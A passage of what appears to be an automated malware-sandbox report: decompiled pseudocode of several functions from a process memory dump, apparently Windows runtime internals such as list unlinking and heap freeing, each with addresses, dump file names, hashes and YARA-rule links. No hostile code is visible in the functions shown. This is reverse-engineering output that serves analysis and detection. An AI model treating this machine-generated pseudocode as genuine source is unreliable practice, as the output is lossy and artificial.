				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E048195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E048195D0();
				_t33 =  *0x48c84c4; // 0x0
				L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x48c84c4; // 0x0
				L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x48c84c4; // 0x0
				E047F2280(L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x48c86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E048195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E048195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E047D9325();
					_t50 =  *0x48c84c4; // 0x0
					return E0482D0D1(L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                        0x047d9240
                                                        0x047d9242
                                                        0x047d9247
                                                        0x047d924c
                                                        0x047d924e
                                                        0x047d9255
                                                        0x047d9257
                                                        0x047d925a
                                                        0x047d925f
                                                        0x047d925f
                                                        0x047d9266
                                                        0x047d9271
                                                        0x047d9276
                                                        0x047d9279
                                                        0x047d927e
                                                        0x047d9295
                                                        0x047d929a
                                                        0x047d92b1
                                                        0x047d92b6
                                                        0x047d92d7
                                                        0x047d92dc
                                                        0x047d92e0
                                                        0x047d92e6
                                                        0x047d92e8
                                                        0x047d92ee
                                                        0x047d9332
                                                        0x047d9333
                                                        0x047d9337
                                                        0x047d9338
                                                        0x047d933a
                                                        0x047d933a
                                                        0x047d933d
                                                        0x047d9342
                                                        0x047d9342
                                                        0x047d9345
                                                        0x047d9349
                                                        0x047d934e
                                                        0x047d9352
                                                        0x047d9357
                                                        0x047d92f4
                                                        0x047d92f4
                                                        0x047d92f6
                                                        0x047d92f9
                                                        0x047d9300
                                                        0x047d9306
                                                        0x047d9324
                                                        0x047d9324

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e3a0c60a9712f8aef527ff92eff2e050823dc98b44cf62270d711ecf06a3c1c7
                                                        • Instruction ID: e5efe703a71e3edbc3998fb3157232ddccb2dc657f14eef4e1becd62bfc81bfc
                                                        • Opcode Fuzzy Hash: e3a0c60a9712f8aef527ff92eff2e050823dc98b44cf62270d711ecf06a3c1c7
                                                        • Instruction Fuzzy Hash: A82105B1051A00DFD725EF68CA44B5AB7F9EF08708F144A68A24A967B1CA78F941CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480B390, Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E0480B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E047F2280(_t12, 0x48c8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E048100C2(0x48c8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                        0x0480b395
                                                        0x0480b3a2
                                                        0x0480b3a5
                                                        0x0480b3aa
                                                        0x0480b3b2
                                                        0x0480b3ba
                                                        0x0480b3bd
                                                        0x0480b3c0
                                                        0x0480b3c4
                                                        0x0480b3c9
                                                        0x0484a3e9
                                                        0x0484a3ed
                                                        0x0484a3f0
                                                        0x0484a3ff
                                                        0x0484a403
                                                        0x0484a409
                                                        0x00000000
                                                        0x00000000
                                                        0x0484a40b
                                                        0x0484a40b
                                                        0x0484a40f
                                                        0x0484a415
                                                        0x0484a423
                                                        0x0484a423
                                                        0x0484a415
                                                        0x0480b3d1
                                                        0x0480b3e8
                                                        0x0480b3e8
                                                        0x0480b3d9

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91fc22dad523b3137f9c2f27c4c5407a89531f3a38a26cefe3029e1655caaf27
                                                        • Instruction ID: ee673564187889c037103a7ff048412d31d0c0b14ce3cc5caea0bf1caa230645
                                                        • Opcode Fuzzy Hash: 91fc22dad523b3137f9c2f27c4c5407a89531f3a38a26cefe3029e1655caaf27
                                                        • Instruction Fuzzy Hash: 251188333511249BDB189A589D80A6B729BEBC5334B354B2DDA16CB3C0EE31BC02C294
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04864257, Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E04864257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x48b08d0);
				E0482D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E048641E8(__ebx, __edi, __ecx, _t39);
				E047EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x48c87e4;
					_t18 =  *0x48c87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x48c5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x48c87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x48c87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L047D7055(_t31 + 0xfffffff8);
								_t24 =  *0x48c87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x48c87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x48c5cd0;
				if( *0x48c5cd0 <= 0) {
					L047D7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x48c87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x48c87e8 = _t30;
						 *0x48c87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0482D0D1(L04864320());
			}















                                                        0x04864257
                                                        0x04864257
                                                        0x04864257
                                                        0x04864259
                                                        0x0486425e
                                                        0x04864263
                                                        0x04864265
                                                        0x04864273
                                                        0x04864278
                                                        0x0486427c
                                                        0x0486427f
                                                        0x04864281
                                                        0x04864287
                                                        0x048642d7
                                                        0x048642d7
                                                        0x048642da
                                                        0x0486428d
                                                        0x0486428d
                                                        0x0486428f
                                                        0x04864292
                                                        0x04864297
                                                        0x0486429c
                                                        0x048642a0
                                                        0x048642a6
                                                        0x048642a8
                                                        0x048642ae
                                                        0x048642b3
                                                        0x00000000
                                                        0x048642ba
                                                        0x048642ba
                                                        0x048642bf
                                                        0x048642c5
                                                        0x048642ca
                                                        0x048642cf
                                                        0x048642d0
                                                        0x00000000
                                                        0x048642d0
                                                        0x048642b3
                                                        0x00000000
                                                        0x048642a6
                                                        0x0486429c
                                                        0x048642dc
                                                        0x048642dc
                                                        0x048642e3
                                                        0x04864309
                                                        0x048642e5
                                                        0x048642e5
                                                        0x048642e8
                                                        0x048642ee
                                                        0x048642f0
                                                        0x00000000
                                                        0x048642f2
                                                        0x048642f2
                                                        0x048642f4
                                                        0x048642f7
                                                        0x048642f9
                                                        0x04864300
                                                        0x04864300
                                                        0x048642f0
                                                        0x0486430e
                                                        0x0486431f

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ba1331e85bc2b49787842c215c6c1f6066d9a3974a0c641008bc75f34ab61ef
                                                        • Instruction ID: c9c95e0e4cb2ae7ba2b5df85b64f54afc14af4f99200ad4ba98a050a72a58172
                                                        • Opcode Fuzzy Hash: 0ba1331e85bc2b49787842c215c6c1f6066d9a3974a0c641008bc75f34ab61ef
                                                        • Instruction Fuzzy Hash: D4214770581600CFD764EF69D104A18BBF1FB85B19F608F6AC106CB398EB7AE881CB45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048546A7, Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E048546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0481F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0480D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L047F77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                        0x048546b7
                                                        0x048546ba
                                                        0x048546c5
                                                        0x048546c8
                                                        0x048546d0
                                                        0x048546d4
                                                        0x048546e6
                                                        0x048546e9
                                                        0x048546f4
                                                        0x048546ff
                                                        0x04854705
                                                        0x04854706
                                                        0x0485470c
                                                        0x04854713
                                                        0x0485471b
                                                        0x04854723
                                                        0x04854725
                                                        0x048546d6
                                                        0x048546d9
                                                        0x048546db
                                                        0x048546db
                                                        0x04854732

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                        • Instruction ID: c8af69b721aec2d657556a51303c36ca81637b186dca1945638edfba7cdb0201
                                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                        • Instruction Fuzzy Hash: E0112572504208BBDB059F5CD8809BEB7B9EF95304F10816AF944C7350DA31AD51D7A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04802397, Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 34%
                                                        			E04802397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x48c848c != 0) {
					L047FFAD0(0x48c8610);
					if( *0x48c848c == 0) {
						E047FFA00(0x48c8610, _t19, _t27, 0x48c8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04802581(0x48c8610, 0x47b50a0, _t26, _t27, _t28);
						E047FFA00(0x48c8610, 0x47b50a0, _t27, 0x48c8610);
					}
				} else {
					L1:
					_t11 =  *0x48c8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04814886(0x47b1088, 1, 0x48c8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04802581(0x48c8610, (_t11 << 4) + 0x47b5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                        0x048023b0
                                                        0x048023b6
                                                        0x04802409
                                                        0x04802415
                                                        0x04845ae9
                                                        0x00000000
                                                        0x0480241b
                                                        0x0480241b
                                                        0x0480241d
                                                        0x04802427
                                                        0x0480242e
                                                        0x04802430
                                                        0x04802430
                                                        0x048023b8
                                                        0x048023b8
                                                        0x048023b8
                                                        0x048023bf
                                                        0x048023fc
                                                        0x048023fc
                                                        0x048023c1
                                                        0x048023c3
                                                        0x048023d0
                                                        0x048023d8
                                                        0x048023d8
                                                        0x048023dc
                                                        0x048023de
                                                        0x048023e1
                                                        0x048023e1
                                                        0x048023ec

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7402d187cbaabcc3c6229e47068133b10f89099c4e1c860909596c1410a6f2ee
                                                        • Instruction ID: 2b932f40a78a22b0b991065400307bad670b4f4e5264dd83dd72d35f3db5ee22
                                                        • Opcode Fuzzy Hash: 7402d187cbaabcc3c6229e47068133b10f89099c4e1c860909596c1410a6f2ee
                                                        • Instruction Fuzzy Hash: 4711253134060067F770AA2D9C88B1AA288EB50619F158E66E606E73D0D9F4FC018695
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DC962, Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 42%
                                                        			E047DC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x48cd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E047EEEF0(0x48c70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0485F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E047EEB70(_t29, 0x48c70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0481B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0485F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x48c70c0; // 0x0
					while(_t38 != 0x48c70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x48cb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                        0x047dc96a
                                                        0x047dc974
                                                        0x047dc988
                                                        0x047dc98a
                                                        0x04847c9d
                                                        0x04847c9f
                                                        0x04847ca4
                                                        0x04847cae
                                                        0x04847cf0
                                                        0x04847cf5
                                                        0x04847cfa
                                                        0x047dc992
                                                        0x047dc996
                                                        0x047dc997
                                                        0x047dc998
                                                        0x047dc9a3
                                                        0x047dc9a3
                                                        0x04847cb0
                                                        0x04847cb7
                                                        0x04847cbb
                                                        0x00000000
                                                        0x00000000
                                                        0x04847cbd
                                                        0x04847ce8
                                                        0x04847cc5
                                                        0x04847cc8
                                                        0x04847cca
                                                        0x04847cd0
                                                        0x04847cd6
                                                        0x04847cde
                                                        0x04847ce4
                                                        0x04847ce4
                                                        0x04847cd0
                                                        0x00000000
                                                        0x04847ce8
                                                        0x047dc990
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8e9e083dde9a7f9e6ce4cce1315ca646df719980756bb1e568fc1bd466f6522
                                                        • Instruction ID: fe54341a31dc02201039f69a5dc1e5016e449ca93198aca2ca08a8cf1671e0df
                                                        • Opcode Fuzzy Hash: d8e9e083dde9a7f9e6ce4cce1315ca646df719980756bb1e568fc1bd466f6522
                                                        • Instruction Fuzzy Hash: 6D11823171064A9FD711AF6DD84592A77E5FB88614B000F29E945D3650EB74FC14CBD2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048137F5, Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E048137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E047F2280(_t6, 0x48c8550);
				}
				_t29 = E0481387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E047EFFB0(0x48c8550, _t27, 0x48c8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                        0x048137fa
                                                        0x048137fc
                                                        0x04813805
                                                        0x04813808
                                                        0x04813808
                                                        0x04813814
                                                        0x04813818
                                                        0x04813846
                                                        0x04813848
                                                        0x0481384b
                                                        0x0481384b
                                                        0x04813852
                                                        0x00000000
                                                        0x04813854
                                                        0x04813856
                                                        0x00000000
                                                        0x00000000
                                                        0x04813863
                                                        0x00000000
                                                        0x04813863
                                                        0x0481381a
                                                        0x0481381a
                                                        0x0481381f
                                                        0x0481386e
                                                        0x0481386e
                                                        0x04813871
                                                        0x04813873
                                                        0x04813873
                                                        0x04813868
                                                        0x00000000
                                                        0x04813868
                                                        0x04813821
                                                        0x04813826
                                                        0x00000000
                                                        0x00000000
                                                        0x04813828
                                                        0x0481382a
                                                        0x04813841
                                                        0x00000000
                                                        0x04813841

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 003fbad0f9ed12702ff34c9e4e7cfe79e04be36dd088cb28c7c34f0fd15d4ade
                                                        • Instruction ID: af8881b917f27bcd90a38245ee8b3bb9ff503c2022d21bdf29517d66cb6c90bf
                                                        • Opcode Fuzzy Hash: 003fbad0f9ed12702ff34c9e4e7cfe79e04be36dd088cb28c7c34f0fd15d4ade
                                                        • Instruction Fuzzy Hash: F90108B1A015109BE3378B1A9900A26BBAEDF85B547154A6BED19CB320D730F801D780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480002D, Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0480002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E047F7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E047F7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E047F7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E047F7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                        0x04800032
                                                        0x04800037
                                                        0x04800043
                                                        0x04844b3a
                                                        0x04800049
                                                        0x04800049
                                                        0x04800049
                                                        0x0480004e
                                                        0x04800053
                                                        0x04844b48
                                                        0x04844b5a
                                                        0x04844b4a
                                                        0x04844b53
                                                        0x04844b53
                                                        0x04844b5f
                                                        0x00000000
                                                        0x04844b61
                                                        0x00000000
                                                        0x04844b61
                                                        0x04800059
                                                        0x04800059
                                                        0x04800060
                                                        0x04844b6f
                                                        0x04844b6f
                                                        0x04800069
                                                        0x04844b83
                                                        0x00000000
                                                        0x00000000
                                                        0x04844b90
                                                        0x04844b9b
                                                        0x04844b9b
                                                        0x04844ba4
                                                        0x00000000
                                                        0x00000000
                                                        0x04844baa
                                                        0x00000000
                                                        0x0480006f
                                                        0x0480006f
                                                        0x00000000
                                                        0x0480006f
                                                        0x04800069

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                        • Instruction ID: 4b59333d5a0a032030fc037074ac85824e14f2cd830d2507777b00d69d8a5c17
                                                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                        • Instruction Fuzzy Hash: AE11C8327156898FE722ABA4DD48B3577D4AF81B5CF0909A1DD04D77E2E729F841C250
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E766D, Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E047E766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0480F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0480F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L047F4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                        0x047e7672
                                                        0x047e767f
                                                        0x047e7689
                                                        0x047e76de
                                                        0x047e76de
                                                        0x047e768b
                                                        0x047e7691
                                                        0x047e7693
                                                        0x047e7697
                                                        0x00000000
                                                        0x047e7699
                                                        0x047e76a8
                                                        0x00000000
                                                        0x047e76aa
                                                        0x047e76ad
                                                        0x047e76b1
                                                        0x00000000
                                                        0x047e76b3
                                                        0x047e76b3
                                                        0x047e76b5
                                                        0x047e76ba
                                                        0x047e76bc
                                                        0x047e76bc
                                                        0x047e76c0
                                                        0x00000000
                                                        0x047e76c2
                                                        0x047e76ce
                                                        0x047e76ce
                                                        0x047e76c0
                                                        0x047e76b1
                                                        0x047e76a8
                                                        0x047e7697
                                                        0x047e76d9

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                        • Instruction ID: d4c88e9f519972ac47f4b878493bee951cb40c145027e7c0634a62882c89b86d
                                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                        • Instruction Fuzzy Hash: C201B132310119EBD724BE5FCC80E6B76ADEB88764F284624BA08CB350DA70ED1187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0486C450, Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 46%
                                                        			E0486C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
